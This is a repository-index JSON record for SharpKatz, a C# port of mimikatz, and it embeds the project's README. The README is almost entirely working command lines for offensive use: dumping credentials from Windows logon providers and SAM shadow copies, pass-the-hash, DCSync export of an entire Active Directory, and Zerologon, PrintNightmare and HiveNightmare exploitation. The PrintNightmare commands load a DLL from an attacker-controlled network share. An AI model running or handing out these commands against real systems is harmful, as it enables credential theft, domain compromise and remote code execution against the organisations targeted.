{"id":13840586,"url":"https://github.com/b4rtik/SharpKatz","last_synced_at":"2025-07-11T09:32:25.162Z","repository":{"id":37449558,"uuid":"265322499","full_name":"b4rtik/SharpKatz","owner":"b4rtik","description":"Porting of mimikatz sekurlsa::logonpasswords,  sekurlsa::ekeys and lsadump::dcsync commands","archived":false,"fork":false,"pushed_at":"2021-11-07T21:29:22.000Z","size":623,"stargazers_count":950,"open_issues_count":4,"forks_count":133,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-08-05T17:25:17.434Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/b4rtik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-05-19T17:56:46.000Z","updated_at":"2024-08-02T02:54:09.000Z","dependencies_parsed_at":"2022-07-12T16:18:03.500Z","dependency_job_id":null,"html_url":"https://github.com/b4rtik/SharpKatz","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b4rtik%2FSharpKatz","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b4rtik%2FSharpKatz/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b4rtik%2FSharpKatz/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b4rtik%2FSharpKatz/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/b4rtik","download_url":"https://codeload.github.com/b4rtik/SharpKatz/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225712519,"owners_count":17512419,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:50.680Z","updated_at":"2024-11-21T10:30:27.028Z","avatar_url":"https://github.com/b4rtik.png","language":"C#","readme":"# SharpKatz\nPorting of mimikatz sekurlsa::logonpasswords,  sekurlsa::ekeys and lsadump::dcsync commands\n\n## Usage\n\n### Ekeys\n\n```SharpKatz.exe --Command ekeys```\u003cbr\u003e\n list Kerberos encryption keys \u003cbr\u003e\n \u003cbr\u003e\n\n### Msv\n\n```SharpKatz.exe --Command msv``` \u003cbr\u003e\nRetrive user credentials from Msv provider \u003cbr\u003e\n\u003cbr\u003e\n\n### Kerberos\n\n```SharpKatz.exe --Command kerberos```\u003cbr\u003e\nRetrive user credentials from Kerberos provider \u003cbr\u003e\n\u003cbr\u003e\n\n### Tspkg\n\n```SharpKatz.exe --Command tspkg```\u003cbr\u003e\nRetrive user credentials from Tspkg provider \u003cbr\u003e\n\u003cbr\u003e\n\n### Credman\n\n```SharpKatz.exe --Command credman```\u003cbr\u003e\nRetrive user credentials from Credman provider \u003cbr\u003e\n\u003cbr\u003e\n\n### WDigest\n\n```SharpKatz.exe --Command wdigest```\u003cbr\u003e\nRetrive user credentials from WDigest provider \u003cbr\u003e\n\u003cbr\u003e\n\n### Logonpasswords\n\n```SharpKatz.exe --Command logonpasswords```\u003cbr\u003e\nRetrive user credentials from all providers \u003cbr\u003e\n\u003cbr\u003e\n\n### List shadowcopies\n\n```SharpKatz.exe --Command listshadows```\u003cbr\u003e\nEnumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject\u003cbr\u003e\n\u003cbr\u003e\n\n### Lsadumpsam\n\n```SharpKatz.exe --Command dumpsam --System \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy1\\\\Windows\\\\System32\\\\config\\\\SYSTEM --Sam \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy1\\\\Windows\\\\System32\\\\config\\\\SAM```\u003cbr\u003e\nDump credential from provided sam database\u003cbr\u003e\n\u003cbr\u003e\n\n### Pth\n\n```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash```\u003cbr\u003e\nPerform pth to create a process under userdomain\\username credential with ntlm hash of the user's password\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key```\u003cbr\u003e\nPerform pth to create a process under userdomain\\username credential user's rc4 key\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash```\u003cbr\u003e\nReplace ntlm hash for an existing logonsession \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256```\u003cbr\u003e\nPerform pth to create a process under userdomain\\username credential with ntlm hash of the user's password and aes256 key \u003cbr\u003e\n\u003cbr\u003e\n\n### DCSync\n\n```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc```\u003cbr\u003e\nDump user credential by username \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc```\u003cbr\u003e\nDump user credential by GUID \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc```\u003cbr\u003e\nExport the entire dataset from AD to a file created in the current user's temp forder\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```\u003cbr\u003e\nDump user credential by username using alternative credentials\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```\u003cbr\u003e\nDump user credential by GUID using alternative credentials\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```\u003cbr\u003e\nExport the entire dataset from AD to a file created in the current user's temp forder using alternative credentials\u003cbr\u003e\n\u003cbr\u003e\n\n### Zerologon\n\nNo reference to logoncli.dll, using the direct rpc call works even from a [non-domain joined workstation](https://twitter.com/gentilkiwi/status/1306178689630076929)\n\n```SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```\u003cbr\u003e\nPerform Zerologon check \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```\u003cbr\u003e\nPerform Zerologon attack \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local```\u003cbr\u003e\nPerform Zerologon attack and dump user credential by username \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local```\u003cbr\u003e\nPerform Zerologon attack and dump user credential by GUID \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local```\u003cbr\u003e\nPerform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp forder\u003cbr\u003e\n\u003cbr\u003e\nNote: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed [here](https://github.com/dirkjanm/CVE-2020-1472) \n\n### PrintNightmare CVE-2021-1675 - CVE-2021-34527\n\n```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\\\\\mycontrolled\\\\share\\\\fun.dll```\u003cbr\u003e\nPerform PrintNightmare attack \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\\\\\mycontrolled\\\\share\\\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom```\u003cbr\u003e\nPerform PrintNightmare attack with provided credentials\u003cbr\u003e\n\u003cbr\u003e\n\n### HiveNightmare CVE-2021-36934\n\n```SharpKatz.exe --Command hiveghtmare```\u003cbr\u003e\nExploit HiveNightmare vulnerability selecting the first available shadowcopy \u003cbr\u003e\n\u003cbr\u003e\n\n\n## Credits\n\nThis project depends entirely on the work of [Benjamin Delpy](https://twitter.com/gentilkiwi) and [Vincent Le Toux](https://twitter.com/mysmartlogon) on [Mimikatz](https://github.com/gentilkiwi/mimikatz) and [MakeMeEnterpriseAdmin](https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1) projects.\u003cbr\u003e\nThe analysis of the code was conducted following the example from [this blog post](https://blog.xpnsec.com/exploring-mimikatz-part-1/) by [xpn](https://twitter.com/_xpn_).\u003cbr\u003e\n\u003cbr\u003e\n","funding_links":[],"categories":["C# (212)","C# #","Operating Systems"],"sub_categories":["Windows"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb4rtik%2FSharpKatz","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fb4rtik%2FSharpKatz","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb4rtik%2FSharpKatz/lists"}